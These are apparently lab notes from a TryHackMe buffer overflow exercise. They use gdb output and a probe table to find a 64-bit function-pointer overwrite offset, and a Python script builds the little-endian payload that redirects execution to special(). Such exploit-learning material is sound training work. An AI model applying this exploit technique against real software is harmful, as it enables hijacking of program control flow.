THM - Buffer Overflow - T7
Check special function address
(gdb) disassemble special
--> Dump of assembler code for function special:
!!> 0x0000000000400567 <+0>: push %rbp <!!---------
--> 0x0000000000400568 <+1>: mov %rsp,%rbp
--> 0x000000000040056b <+4>: mov $0x400680,%edi
--> 0x0000000000400570 <+9>: callq 0x400460 <puts@plt>
--> 0x0000000000400575 <+14>: mov $0x40069d,%edi
--> 0x000000000040057a <+19>: callq 0x400460 <puts@plt>
--> 0x000000000040057f <+24>: nop
--> 0x0000000000400580 <+25>: pop %rbp
--> 0x0000000000400581 <+26>: retq
--> End of assembler dump.
little endian: the address is written least-significant byte first. 0x400567 is an 8-byte pointer on this 64-bit binary, but its top two bytes are zero, so only the low 6 bytes need to be sent (the probe table below shows the upper bytes are already zero):
\x00\x00\x00\x40\x05\x67 --> \x67\x05\x40\x00\x00\x00
Control over RIP (64-bit binary, so the overwritten function pointer is 8 bytes wide, not a 32-bit EIP)
gdb func-pointer
(gdb) run
AAAAAAAAAAAAAAAAAAAA
--> 0x0000414141414141
Example payloads (fed to the program on stdin, increasing one byte at a time until 0x41 shows up in the pointer; each extra A lands one byte higher, so the pointer starts 14 bytes into the input)

Payload (stdin)                        | Result
---------------------------------------|-----------------------
AAAAAAAAAAAAAA (14 bytes)              | 0x00007fffffffeb27  (pointer not reached)
AAAAAAAAAAAAAAAA (16 bytes)            | 0x0000000000004141
AAAAAAAAAAAAAAAAA (17 bytes)           | 0x0000000000414141
AAAAAAAAAAAAAAAAAA (18 bytes)          | 0x0000000041414141
AAAAAAAAAAAAAAAAAAAA (20 bytes)        | 0x0000414141414141
AAAAAAAAAAAAAA\x67\x05\x40\x00\x00\x00 | you did this, friend!
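Added example, not code from the THM room or its func-pointer binary: a small Python helper that does the three steps above in one place, packing the special() address little-endian, deriving the offset from an observed pointer value instead of eyeballing the table, and assembling the final payload. It assumes the binary reads the payload from stdin as on this page, that the address and probe values are the ones shown above, and that the pointer's original contents never happen to contain the filler byte 0x41.

```python
import struct
import sys

# Values taken from the gdb session above
SPECIAL_ADDR = 0x400567          # address of special() from "disassemble special"
FILLER = b"A"                    # 0x41, the byte that shows up in the pointer


def p64(addr):
    """Pack a 64-bit address little-endian (least-significant byte first)."""
    return struct.pack("<Q", addr)


def le_bytes(addr, width=6):
    """The page's 6-byte form: drop the two high bytes, which are always zero
    for a user-space address like 0x400567."""
    return addr.to_bytes(width, "little")


def offset_from_observation(payload_len, observed_ptr, filler=FILLER):
    """Work out how many bytes sit between the start of the buffer and the
    function pointer from one probe run.

    The overflow reaches the pointer's low byte first, so if n low bytes of
    the pointer hold the filler value, the last n bytes of the payload landed
    on it and the pointer starts payload_len - n bytes into the input.
    Returns None when the probe did not reach the pointer at all.
    Assumption: the pointer's own value never contains the filler byte.
    """
    n = 0
    for b in p64(observed_ptr):          # bytes in memory order, low byte first
        if b != filler[0]:
            break
        n += 1
    return payload_len - n if n else None


def build_payload(offset, target=SPECIAL_ADDR, filler=FILLER, width=8):
    """Filler up to the pointer, then the target address little-endian.

    width=8 writes the whole pointer; width=6 reproduces the page's payload and
    relies on the high two bytes already being zero (they are in the table above).
    The embedded NUL bytes are fine for stdin readers such as gets()/fgets(), but
    would truncate the payload if it were passed through argv or strcpy().
    """
    return filler * offset + target.to_bytes(width, "little")


def solve(probes, target=SPECIAL_ADDR):
    """probes: list of (payload_len, observed_ptr) from increasing-length runs.
    Every probe that reached the pointer must agree on the same offset."""
    offsets = {offset_from_observation(n, v) for n, v in probes}
    offsets.discard(None)
    if len(offsets) != 1:
        raise ValueError(f"probes disagree on the offset: {sorted(offsets)}")
    return build_payload(offsets.pop(), target)


if __name__ == "__main__":
    # Probe results copied from the table above: (payload length, pointer value)
    observed = [
        (14, 0x00007FFFFFFFEB27),
        (16, 0x0000000000004141),
        (17, 0x0000000000414141),
        (18, 0x0000000041414141),
        (20, 0x0000414141414141),
    ]
    # usage: python3 exploit.py | ./func-pointer
    sys.stdout.buffer.write(solve(observed))
```

Run it as `python3 exploit.py | ./func-pointer`; the script writes raw bytes through `sys.stdout.buffer` so the NUL bytes of the address survive the pipe. If a probe ever disagrees with the others (for example because the filler byte was already present in the pointer), `solve` refuses to guess rather than emitting a payload with the wrong offset.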